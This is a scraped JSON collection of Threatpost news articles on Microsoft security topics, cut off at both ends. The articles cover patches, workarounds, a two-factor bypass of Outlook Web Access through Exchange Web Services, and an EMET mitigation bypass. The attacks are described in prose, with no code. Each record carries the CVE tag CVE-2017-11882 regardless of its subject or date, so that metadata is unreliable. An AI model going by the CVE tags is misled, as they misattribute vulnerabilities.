The vulnerability was initially highlighted in [Oracle\u2019s Critical Patch Update Advisory for this month](<http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html>).\n\nIn a [post on its Technet blog](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>), Dave Forstrom of Trustworthy Computing said Microsoft isn\u2019t aware of any active exploits against the vulnerability but insisted following the workaround would be the best practice for users until an adequate security update was developed.\n\n[A separate blog post](<http://blogs.technet.com/b/srd/archive/2012/07/24/more-information-on-security-advisory-2737111.aspx>) by Microsoft\u2019s Security and Defense team explains the best way to minimize risk is disabling WebReady Document Viewing on the VDir of all CAS servers. This will circumvent a problem that lies in the way WebReady Document Viewing renders certain attachments as a web page \u201cinstead of relying on local applications to open/view it,\u201d according to the post.\n\nFor more on this, including a more in depth explanation of the Oracle flaw, head to [Technet](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>).\n", "cvss3": {}, "published": "2012-07-26T16:34:25", "type": "threatpost", "title": "Microsoft Publishes Workaround for Oracle Outside In Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:105BBC66E564BD98581E52653F5EA865", "href": "https://threatpost.com/microsoft-publishes-workaround-oracle-outside-vulnerability-072612/76854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry 
outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. 
Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. \u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. 
Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:06", "description": "Microsoft has released some [updated guidance on the recent DLL-hijacking bug](<http://blogs.technet.com/b/srd/>), including a new FixIt tool that enables the workaround for the vulnerability that Microsoft shipped late last month. \n\nThe new guidance includes a detailed explanation of the bug itself as well as how potential attacks would work and what users can do to protect themselves. In a blog post, Jonathan Ness of the Microsoft Security Response Center Engineering Team, explained that there are a number of different potential attack vectors, including a WebDAV share.\n\n\u201cUnfortunately, based on attack patterns we have seen in recent years, \nwe believe it is no longer safe to browse to a malicious, untrusted \nWebDAV server in the Internet Zone and double-click on **_any_** \ntype of files. Attackers are clever, substituting dangerous file icons \nwith safe, trusted file icons. They have even recently begun obfuscating \nthe filename based on character encoding tricks (such as right-to-left \ncharacter encoding). Their goal is to entice unsuspecting users into \ndouble-clicking on a malicious executable. 
With or without this new remote vector to the DLL Preloading issue, it\u2019s very hard to make a trust decision given the amount of control an attacker has over the malicious WebDAV server browsing experience. We recommend users only double-click on file icons from WebDAV shares known to be trusted, safe, and not under the control of a malicious attacker,\u201d Ness said.\n\nThe company has released a workaround for the DLL bug, which involved editing the registry to create a new entry. The solution also includes a downloadable tool. But the tool was turned off by default, so Microsoft has now published a new FixIt tool that will automatically enable it.\n\nHere are the steps that Microsoft recommends:\n\n * Install the tool from [KB2264107](<http://support.microsoft.com/kb/2264107>).\n * Log on to your computer as an administrator. \n * Open Registry Editor. \n * Locate and then click the following registry subkey: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\n * Right-click Session Manager, point to New, and then click Dword Value.\n * Type CWDIllegalInDllSearch, and then click Modify. \n * In the Value data box, type 0xFFFFFFFF, and then click OK.\n\nThe company warns that there could be unforeseen issues, so users should test the fix before deploying it. \n", "cvss3": {}, "published": "2010-09-01T13:38:15", "type": "threatpost", "title": "Microsoft Publishes New FixIt Tool For DLL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:11", "id": "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "href": "https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/74409/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:25", "description": "Microsoft has hired yet another well-known security researcher to join its ever-growing team of exploit and defense experts. 
This time it\u2019s Ken Johnson, known in the hacker world as [Skywing](<http://www.nynaeve.net/>). Johnson is known as an expert on debugging and reverse engineering, and has done a tremendous amount of work [tearing apart Windows defenses](<http://www.uninformed.org/?v=2&a=4>) specifically.\n\nBefore moving to Microsoft, Johnson was working for Positive Networks, a VPN provider. In a [blog post](<http://blogs.msdn.com/michael_howard/archive/2009/03/24/ken-johnson-skywing-joins-microsoft.aspx>) announcing Johnson\u2019s hiring, Microsoft software security guru Mike Howard praised Johnson\u2019s experience and skill. \n\n\u201cKen brings an enormous amount of reverse engineering and defense-subversion skill to Microsoft. Ken will be working on anything and everything related to vulnerabilities, exploits, defenses, bypassing defenses and more,\u201d Howard said.\n\nJohnson\u2019s hiring is the latest in a series of interesting personnel moves for Microsoft\u2019s security group. The changes essentially began about three years ago when Adam Shostack joined Microsoft. Shostack is a well-known security and privacy expert who had spent years in start-ups and smaller organizations and was not afraid to be critical of Microsoft\u2019s policies. \n\n\u201cIn the past, I\u2019ve [heaped scorn](<http://www.securityfocus.com/news/315>) on Microsoft\u2019s security related decisions. Over the last few years, I\u2019ve watched Microsoft embrace security. I\u2019ve watched them make very large investments in security, including hiring my friends and colleagues. And really, I\u2019ve watched them produce results,\u201d Shostack wrote in a [blog post at the time of his hiring at Microsoft](<http://www.emergentchaos.com/archives/2006/06/im_joining_microsoft.html>). \n\nThen in January 2008 Microsoft hired Crispin Cowan, an expert on Linux and open-source security who was the brains behind the Immunix security-enhanced Linux distribution. 
And a few months later Matt Miller joined Microsoft, as well. Known as [Skape](<http://hick.org/~mmiller/>), Miller was a big part of HD Moore\u2019s [Metasploit Project](<http://metasploit.org/>) team and is known for his work on exploitation techniques.\n\nGiven the emphasis that Microsoft has placed on anti-exploitation and memory protection in its most recent releases, including Vista and Internet Explorer 8, it stands to reason that the company will continue to bring in more of the people who have done work on the other side of that fence. There\u2019s no defense like a good offense. \n", "cvss3": {}, "published": "2009-03-25T15:27:43", "type": "threatpost", "title": "Ken \"Skywing\" Johnson joins Microsoft security team", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:29", "id": "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "href": "https://threatpost.com/ken-skywing-johnson-joins-microsoft-security-team-032509/72482/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital 
Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:02", "description": "Threat modeling has been part of the security culture at Microsoft for the better part of a decade, an important piece of the Security Development Lifecycle that\u2019s at the core of Trustworthy Computing.\n\nToday, Microsoft updated its free Threat Modeling Tool with a number of enhancements that bring the practice closer to not only large enterprises, but also smaller companies with a growing target on their back.\n\nFour new features have been added to the tool, including enhancements to its visualization capabilities, customization features for older models and threat definitions, as well as a change to how it generates threats.\n\n\u201cMore and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating,\u201d said Tim Rains, a Trustworthy Computing manager. \u201cThreat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. 
Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.\u201d\n\nThe first iteration of Microsoft Threat Modeling Tool was issued in 2011, but Rains said customer feedback and suggestions for improvements since then have been rolled into this update. The improvements include a new drawing surface that no longer requires Microsoft Visio to build data flow diagrams. The update also includes the ability to migrate older, existing threat models built with version 3.1.8 to the new format. Users can also upload existing custom-built threat definitions into the tool, which also comes with its own definitions.\n\nThe biggest change in the new version is in its threat-generation logic. Where previous versions followed [the STRIDE framework](<http://msdn.microsoft.com/en-us/magazine/cc163519.aspx>) (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege) per element, this one follows STRIDE per interaction of those elements. STRIDE helps users map threats to the properties guarding against them; for example, spoofing maps to authentication.\n\n\u201cWe take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements,\u201d Rains said.\n\nAt the RSA Conference in February, Trustworthy Computing program manager Adam Shostack said that there is [no one defined way to model threats](<http://threatpost.com/threat-modeling-legos-and-dancing-babies/104517>); that they must be specific to organizations and their particular risks.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d Shostack said. \u201cThere\u2019s no one way to threat model. 
The right way is the way that fixes good threats.\u201d\n", "cvss3": {}, "published": "2014-04-15T15:07:23", "type": "threatpost", "title": "Microsoft Releases Free Threat Modeling Tool 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-17T19:50:40", "id": "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "href": "https://threatpost.com/microsoft-releases-updated-threat-modeling-tool-2014/105467/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "Microsoft\u2019s research unit is investing resources in a new Web browser that could eventually signal a shift away from the ubiquitous Internet Explorer.\n\nAccording to a research paper released this week, the project is called Gazelle and is positioned as a secure web browser constructed as a multi-principal operating system.\n\nFrom [the research paper](<http://research.microsoft.com/pubs/79655/gazelle.pdf>) (.pdf):\n\nGazelle\u2019s Browser Kernel is an operating system that exclusively manages resource protection and sharing across web site principals. This construction exposes intricate design issues that no previous work has identified, such as legacy protection of cross-origin script source, and cross-principal, cross-process display and events protection. 
We elaborate on these issues and provide comprehensive solutions.\n\nOur prototype implementation and evaluation experience indicates that it is realistic to turn an existing browser into a multi-principal OS that yields significantly stronger security and robustness with acceptable performance and backward compatibility.\n\nMore [at Slashdot](<http://tech.slashdot.org/article.pl?sid=09/02/22/1724244>).\n", "cvss3": {}, "published": "2009-03-03T20:45:46", "type": "threatpost", "title": "Microsoft researching new (secure) browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:39", "id": "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "href": "https://threatpost.com/microsoft-researching-new-secure-browser-030309/72358/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "Microsoft announced yesterday that it will complement the [two-factor authentication](<http://threatpost.com/microsoft-reportedly-adding-two-factor-authentication-user-accounts-041013>) it enabled for account holders in April with [additional security features](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-features-added-to-microsoft-accounts.aspx>) designed to deny account hijacking and unauthorized access.\n\nWindows PC and mobile users, along with Outlook, SkyDrive, Xbox, Skype and other Microsoft services users will soon have three new capabilities to further prop up their accounts.\n\nThe most novel may be a dashboard view that presents a user with a log of recent activity, such as log-in attempts\u2014including failed attempts\u2014as well as the addition or deletion of security information and the type of device and browser used for a particular activity. 
Location is displayed on a map, as well as timestamp data.\n\n\u201cYou know best what\u2019s been happening with your account \u2013 so the more we give you tools to understand what\u2019s happening, the better we can work together to protect your account,\u201d wrote Eric Doerr, a group program manager at Microsoft. \u201cFor example, a login from a new country might look suspicious to us, but you might know that you were simply on vacation or on a business trip.\u201d\n\nUsers who determine there has been suspicious or unauthorized activity can click on a \u201cThis wasn\u2019t me\u201d button that will then display steps the user can take to secure their accounts.\n\nIn addition, users who have already enabled [two-factor authentication](<http://blogs.technet.com/b/microsoft_blog/archive/2013/04/17/microsoft-account-gets-more-secure.aspx>) will be able to generate a recovery code to access their accounts without having to use the information provided during the setup of two-factor.\n\n\u201cBecause two-step verification setup requires two verified pieces of security information, like a phone number and email address, it will be a rare occasion when both options fail, but in the event they do, we\u2019ve got you covered,\u201d Doerr said.\n\nMicrosoft said that any account user will be able to add a recovery code to their account, but users will be able to request only one recovery code at a time; requesting a new one cancels the old one, Doerr said.\n\n\u201cYour recovery code is like a spare key to your house,\u201d Doerr said. \u201cSo make sure you store it in a safe place.\u201d\n\nThe final new feature users may expect is additional management of security notifications, such as password resets. Users will be able to select, for example, whether they want security notifications sent to an email address or a mobile device via text message.\n\nMicrosoft account holders have had two-factor authentication at their disposal since April. 
Users are asked to provide two pieces of security information that Microsoft stores; the user will enter a password, for example, and then have a code sent to their mobile device as a second authenticator.\n\nMicrosoft also released an Authenticator app for Windows Phone; the app is built on a standard authentication protocol, meaning that it could be used on other Web-based services such as those offered by Google, Dropbox and others.\n", "cvss3": {}, "published": "2013-12-10T08:00:18", "type": "threatpost", "title": "Microsoft Protects User Accounts with New Security Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-10T00:55:21", "id": "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "href": "https://threatpost.com/microsoft-adds-new-security-features-to-accounts/103138/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Enterprises running Exchange Server have been operating under a false sense of security with regard to two-factor authentication implementations on Outlook Web Access (OWA) adding an extra layer of protection.\n\nA design weakness has been exposed that can allow an attacker to easily bypass 2FA and access an organization\u2019s email inboxes, calendars, contacts and more.\n\nThe problem lies in the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA and it is [not covered by two-factor authentication](<http://www.blackhillsinfosec.com/?p=5396>). EWS is enabled by default and shares the same port and server as OWA, meaning an attacker with [stolen] credentials can remotely access EWS, which talks to the same backend infrastructure as OWA, and gain access to a user\u2019s inbox.\n\nThe issue was publicly disclosed on Wednesday by researcher Beau Bullock of Black Hills Information Security, a consultancy based in South Dakota. 
Bullock privately disclosed his findings to Microsoft on Sept. 28, and after an initial acknowledgement, repeated follow-up emails failed to produce a patch or mitigation. Bullock went public yesterday, but shortly thereafter, Microsoft contacted him with a mitigation that would likely break some services that rely on Exchange Web Services, such as thick clients like Outlook for Mac.\n\nBullock told Threatpost that it\u2019s likely Microsoft cannot fix this without re-architecting some parts of the affected infrastructure.\n\n\u201cThe biggest thing is that Outlook Web Access is on the same webserver as Exchange Web Services and they\u2019re both enabled by default. I think the biggest problem is that most people don\u2019t seem to understand that\u2019s the thing that\u2019s happening,\u201d Bullock said. \u201cA lot of people think they have this Exchange server on the Internet and they have it there just for OWA, but the biggest problem is they don\u2019t understand EWS is enabled by default as well. The fix is more widespread awareness that it\u2019s actually there.\u201d\n\nBullock, a penetration tester, believes that there isn\u2019t a lot of awareness that this configuration exists and that organizations aren\u2019t aware that this second protocol is running alongside OWA and is not covered by 2FA.\n\n\u201cThat\u2019s not inherently clear in the documentation that if you enable two-factor authentication on OWA, you have to be careful that you have this other protocol right here that is still only single factor,\u201d Bullock said. \u201cIt talks to same backend infrastructure.\u201d\n\nBullock pointed out that it\u2019s not unusual to have different protocols, such as RDP and SMB, running on the same server where, for example, RDP is covered by two-factor authentication and SMB is not. 
The two services, however, are not running on the same port, and Bullock points out that an enterprise could create firewall rules to curtail access.\n\n\u201cThat\u2019s why this is more of a serious issue,\u201d Bullock explained. \u201cWhen you expose a server externally, you allow access only to that port. If you don\u2019t know a completely separate protocol is operating on same port, you\u2019re potentially opening up another way to communicate to that infrastructure.\u201d\n\nBullock described in a report published yesterday how he carried out the attack against OWA protected by Duo for Outlook 2FA. \nBy targeting EWS with his test account\u2019s credentials and a pen-testing tool called MailSniper, which connects to Exchange and searches an inbox for sensitive data, Bullock was able to bypass the 2FA protecting OWA. An attacker in a real-world scenario could gain access to a user\u2019s credentials, for example, from any of the tens of millions of credentials dumped online this summer.\n\nTo confirm that this wasn\u2019t an issue with Duo for Outlook, Bullock ran a similar test against Office 365 with Microsoft Azure Multifactor Authentication enabled. Using the same attack, he was able to bypass that 2FA as well, Bullock said.\n\n\u201cThis does not affect Office 365 with multi-factor authentication (MFA) fully enabled. What the blog describes is not a software vulnerability and does not work without user account credentials/stolen passwords,\u201d a Microsoft spokesperson told Threatpost.\n\n\u201cI think in the end, the best solution would be to re-architect it,\u201d Bullock said. \u201cIn the short term, how hard would it be for Microsoft to disable it by default and if an organization actually needed to use EWS for a thick client, then they could enable it. 
They\u2019re trying to keep all the protocols open and make it easier for deployment.\u201d\n", "cvss3": {}, "published": "2016-11-03T15:15:56", "type": "threatpost", "title": "Outlook Web Access Two-Factor Authentication Bypass Exists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-03T19:15:56", "id": "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "href": "https://threatpost.com/outlook-web-access-two-factor-authentication-bypass-exists/121777/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2014 Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is scheduled to deliver a presentation this morning at the Security BSides conference explaining how the company\u2019s researchers were able to bypass all of the memory protections offered within the free Windows toolkit.\n\nThe work is significant given that Microsoft has been quick to urge customers to install and run EMET as a [temporary mitigation against zero-day exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting memory vulnerabilities in Windows or Internet Explorer.\n\nEMET is not meant to be a permanent fix; instead, it is supposed to terminate or block actions by malware or exploits threatening previously unreported vulnerabilities until a patch is available.\n\nMicrosoft is expected to release the latest version of EMET this week during the RSA Conference; Rahul Kashyap, chief security architect at Bromium, said the company has been working closely with Microsoft and expects the vulnerability to be addressed in the new EMET release.\n\nEMET comes with a dozen different mitigations starting with 
Data Execution Prevention and Address Space Layout Randomization, two key memory protections in Windows, as well as a handful of mitigations against return-oriented programming (ROP), heap spray and SEHOP mitigations, and more.\n\nKashyap said Bromium\u2019s technique bypasses all of EMET\u2019s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool.\n\n\u201cWe analyzed all of the protections, and took an IE exploit and then we kept on tweaking the exploit payload until we were able to bypass all the mitigations available in EMET,\u201d Kashyap said. \u201cEverything is bypassed in its latest version.\u201d\n\nKashyap said EMET has raised the bar significantly for exploit writers trying to beat Windows\u2019 protections. Malware writers, such as those behind [Operation SnowMan targeting the latest IE zero-day](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), have taken to adding modules that scan computers for EMET libraries and will not execute if EMET is installed.\n\n\u201cEMET, like any other tool, needs to know exploitation vectors to be able to block them. We tried to attack that very core, fundamental architectural drawback that most tools today have, which is you need to detect an exploit in order to protect,\u201d Kashyap said. \u201cIn this case, we studied the mitigations available in EMET and then we tweaked a payload to create a new vector variant which could bypass the existing mitigations.\u201d\n\nIn a [paper](<http://labs.bromium.com/>) released today, DeMott explained that the researchers intended initially to target just the five ROP protections in EMET with a real-world browser exploit. 
The project grew to include all relevant protections including stack pivot protection, shellcode complete with an EAF bypass and more, DeMott wrote.\n\n\u201cThe impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection,\u201d DeMott wrote. \u201cThis is true of EMET and other similar userland protections.\u201d\n\nBromium said its research focused on 32-bit Windows 7 systems running EMET 4.0 and 4.1 (ROP protection is not implemented for 64-bit processes, the paper said). ROP is an exploitation technique that evolved from ret2libc, which enables an attacker to inject and execute code by re-using code that already exists. The ROP technique changes executable permissions in memory space, DeMott explained in the paper, in order to execute the attacker\u2019s code located elsewhere. An attacker must chain together a series of processes in order for ROP to succeed.\n\nEMET has been bypassed numerous times before. Researcher [Aaron Portnoy](<http://thunkers.net/~deft/presentations/SummerCon%202013/Aaron_Portnoy-Bypassing_All_Of_The_Things.pptx>), cofounder of Exodus Intelligence, presented a paper during last year\u2019s SummerCon that explained a number of EMET bypasses. Two years ago, a researcher in Iran named Shahriyar Jalayeri reported [two bypasses of EMET\u2019s five ROP protections](<http://threatpost.com/researcher-finds-technique-bypass-microsofts-emet-protections-080912/76895>).\n\nYou can expect researchers to continue to try to poke holes in EMET. 
The upcoming Pwn2Own contest at the CanSecWest Conference is offering a $150,000 grand prize to anyone able to [bypass EMET running on Windows 8.1 and Internet Explorer 11](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>).\n", "cvss3": {}, "published": "2014-02-24T08:43:50", "type": "threatpost", "title": "Complete Microsoft EMET Bypass Developed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-26T23:48:50", "id": "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "href": "https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:04", "description": "[Howard Schmidt](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>), the top White House information security adviser, is retiring after more than two years on the job and several decades in security both in government and private industry. Schmidt is in his second stint as the White House security chief and he\u2019s leaving at a time when cybersecurity has moved into the top tier of military and economic concerns for the country.\n\nThe departure is a blow to the Obama administration\u2019s efforts on cybersecurity and comes at a time when the White House is wrangling with Congress on legislation designed to address various information security problems and weaknesses. There are competing proposals in Congress right now and one of the major sticking points has been what kind of information companies will be allowed to share with government agencies regarding attacks and vulnerabilities.\n\nSchmidt, who will leave at the end of the month, took on the role of White House cybersecurity coordinator in early 2010 after a varied and long career in security and law enforcement. 
He was the CISO of Microsoft, an Air Force officer, and had earlier served as the top cybersecurity officer in the George W. Bush administration. After Obama took office, the top information security job was vacant for quite a while, and word at the time was that the job had been offered to a variety of top executives in the security industry, but no one had been interested.\n\nThe position was seen as having a lot of prestige, but not much in the way of power because the responsibility for information security inside the federal government is so splintered. The Department of Homeland Security, U.S. Cyber Command, National Security Agency and other groups all have some sort of responsibility for security. There were not many takers for the job of throwing a rope around all of that mess and trying to work with the private sector and other governments to fight cybercrime.\n\n\u201cThe private sector in the prevention of crime is very key, and, once again, look at a continuum. The products that are created, whether it\u2019s software or hardware, become more resistant to some of the things that we see out there, whether it\u2019s phishing/spearphishing, whether it\u2019s vulnerabilities in software and hardware where private sector has a lead role in being able to reduce that from taking place,\u201d [Schmidt said in an interview](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>) last year.\n\n\u201cThe other piece, as when we look at some of the things like the National Cyber Security Alliance here in the U.S., we look at some of the other partnerships that take place in Australia, Canada, U.K. and how they work with the private sector, just even some of the messaging thing about how to protect your identity online. 
ENISA, the European Network Information Security Agency has done a lot of really good work in what they call the AR Group, the Awareness Raising Group that puts together some best practices for consumers and businesses and everything. So, working with the private sector is really key, because they can not only help build the technology that reduces the likelihood of becoming a victim, but they can also help spread the message with their customers.\u201d\n\nSchmidt will be replaced in the White House by Michael Daniel, who works in the budget office, according to a report in the [Washington Post](<http://www.washingtonpost.com/world/national-security/white-houses-cybersecurity-official-retiring/2012/05/16/gIQAX6fmUU_story.html>). Daniel has worked on intelligence and security issues for several years.\n\nOne of the major initiatives undertaken by the White House during Schmidt\u2019s tenure was the development of the National Strategy for Trusted Identities in Cyberspace, a blueprint for the adoption of non-password based online identities. Schmidt said he saw the development of alternative authentication methods as a key for improving security.\n\n\u201cWe\u2019re starting to see a lot of these companies working with other companies to make sure we\u2019re looking at the full breadth of things, not only the one-time password that may be on your mobile device, but also what can we do to make sure that somebody doesn\u2019t wind up hijacking that through some other sort of mechanism? So, overall, I think there\u2019s a full recognition of the challenges we have moving forward. 
The people that I\u2019ve talked to in the national program office I\u2019ve talked with recognize that the status quo doesn\u2019t apply here, that we can take a lot from the experiences we\u2019ve had in the past and the next generation of trusted identities or strong authentication or in-person proofing, we can much improve over where we\u2019ve been to date, so very, very positive,\u201d he said in the [2011 interview with Threatpost](<https://threatpost.com/schmidt-white-house-feels-very-positive-about-prospects-data-breach-bill-passing-061411/>).\n", "cvss3": {}, "published": "2012-05-17T14:54:17", "type": "threatpost", "title": "White House Security Czar Howard Schmidt Retiring", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "href": "https://threatpost.com/white-house-security-czar-howard-schmidt-retiring-051712/76577/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:50", "description": "Some users who have installed the [MS14-066 patch](<https://threatpost.com/microsoft-schannel-bug-latest-in-long-line-of-serious-crypto-flaws/109321>) that fixes a vulnerability in the Schannel technology in Windows are having issues with the fix causing TLS negotiations to fail in some circumstances.\n\nThe problem arises when users 